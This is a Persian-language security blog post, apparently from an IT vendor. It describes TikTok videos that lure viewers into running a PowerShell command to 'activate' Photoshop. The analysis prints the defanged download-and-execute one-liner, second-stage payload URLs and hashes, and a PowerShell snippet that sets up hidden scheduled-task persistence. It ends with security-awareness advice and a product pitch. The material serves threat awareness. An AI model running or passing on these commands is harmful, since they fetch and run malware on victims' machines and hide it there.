ویدئوهای تیک تاک انتشاردهنده بدافزار
هکرها همه جا هستند! آنها سعی میکنند با استفاده از کانالهای جدید ارتباطی و تکنیکهای مهندسی اجتماعی جدید، همواره قربانیان را فریب دهند.به گزارش ICS.Sans، به تازگی ویدئویی در تیک تاک ادعا میکند یک روش آسان جهت فعالسازی ابزار Photoshop ارائه مینماید..
همانطور که از شواهد موجود در تصویر مشخص است، این ویدئو تاکنون بیش از ۵۰۰ لایک دریافت کرده است! این به این معنی است که استفاده از ابزار مهندسی اجتماعی و فریب کاربر تا اینجا به درستی کار خود را انجام داده است.
در ادامه از قربانی خواسته میشود که یک PowerShell را با دسترسی مدیر (administrator) اجرا کرده و یک دستور تکخطی را اجرا کند:
iex (irm slmgr[.]win/photoshop)
با بازدید از این لینک، قطعهای کدی مخرب از PowerShell دریافت میکنید که اجرا خواهد شد.
(SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23)
این نمونه فایل پس از بررسی در VirusTotal امتیاز 22/62 دریافت کرد.!!!
بیایید آن را بررسی کنیم!
در مرحله بعدی فایل ثانویه از آدرس https://file-epq[.]pages[.]dev/updater.exe دانلود خواهد شد. تداوم (persistence) از طریق یک تسک زمانبندیشده (scheduled task) که در زمان ورود (logon) اجرا میشود، پیادهسازی شده است:
$tasknames = @(‘MicrosoftEdgeUpdateTaskMachineCore’,’GoogleUpdateTaskMachineCore’,’AdobeUpdateTask’,’OfficeBackgroundTaskHandlerRegistration’,’WindowsUpdateCheck’)
$taskname = $tasknames[(Get-Random -Max 5)]
$action = New-ScheduledTaskAction -Execute “powershell.exe” -Argument “-WindowStyle Hidden -ExecutionPolicy Bypass -Command `”$scr`””
$trigger = New-ScheduledTaskTrigger -AtLogOn
$principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive -RunLevel Highest
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable -DontStopOnIdleEnd
Register-ScheduledTask -TaskName $taskname -Action $action -Trigger $trigger -Principal $principal -Settings $settings -Force -ErrorAction SilentlyContinue | Out-Null
فایل updater.exe(SHA256:58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8)
نیز پس از بررسی در Virus Total امتیاز 49/72 را به خود اختصاص داده است!
در نهایت، payload دیگری دانلود و اجرا میشود: source.exe:
(Sha256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011)
این فایل نیز پس از بررسی در Virus Total امتیاز 39/72 را به خود اختصاص داده است!
این فایل نیز از یک تکنیک جالب استفاده میکند: در حین اجرا، کدی را بهصورت on-demand کامپایل میکند:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe” /noconfig /fullpaths @”C:\Users\admin\AppData\Local\Temp\vpkwkdbo.cmdline”
همانطور که از شواهد مشخص است، بدون توجه به اینکه محتوای موجود در ویدئو توسط چه کسی آپلود شده، اجرا شده و کاربر نیز بر اساس محتوای فریب موجود در آن اقدام به اجرای فرمانهای حاوی بدافزار روی ایستگاه کاری خواهد نمود.
خطای انسانی در حال حاضر در دنیای امنیت سایبری رشد چشمگیری داشته و کارمندان سازمان به صورت سهوی و گاه عمدی، خسارات جبران ناپذیری را متوجه سازمان مینمایند.
طبق گزارش تیم فنی و پشتیبانی شرکت مدیران شبکه برنا، در حال حاضر سازمانهای مختلف نیازمندی فوری به آموزش کارمندان در زمینه آگاهی رسانی امنیتی، جهت کاهش ریسکهای محتمل بر شبکه باید در دستورکار قرار گیرد. دسته بندی دادههای حساس سازمانی، اعمال محدودیت وبگردی در سطح ایستگاههای کاری، اعمال محدودیت اجرای نرمافزارهای مغایر با سیاستهای سازمان و… تنها بخشی از مواردی است که باید به صورت ویژه در سازمانهای بزرگ و کوچک به آن پرداخته شود. شرکت مدیران شبکه برنا در جهت جلوگیری از تهدیدات امنیتی و تشخیص حملات نوظهور، همچنین به منظور جلوگیری از نشت داده، دسته بندی دادههای حساس سازمانی و همچنین تخصیص دسترسی کاربران در سازمان، محصولات DLP و EDR پیشرفته را در سبدکالایی خود قرارداده است. شما میتوانید جهت دریافت اطلاعات بیشتر و همچنین مشاوره فنی در جهت استفاده از راهکارهای مذکور با ما در ارتباط باشید.
امن بمانید و به چنین محتواهایی اعتماد نکنید.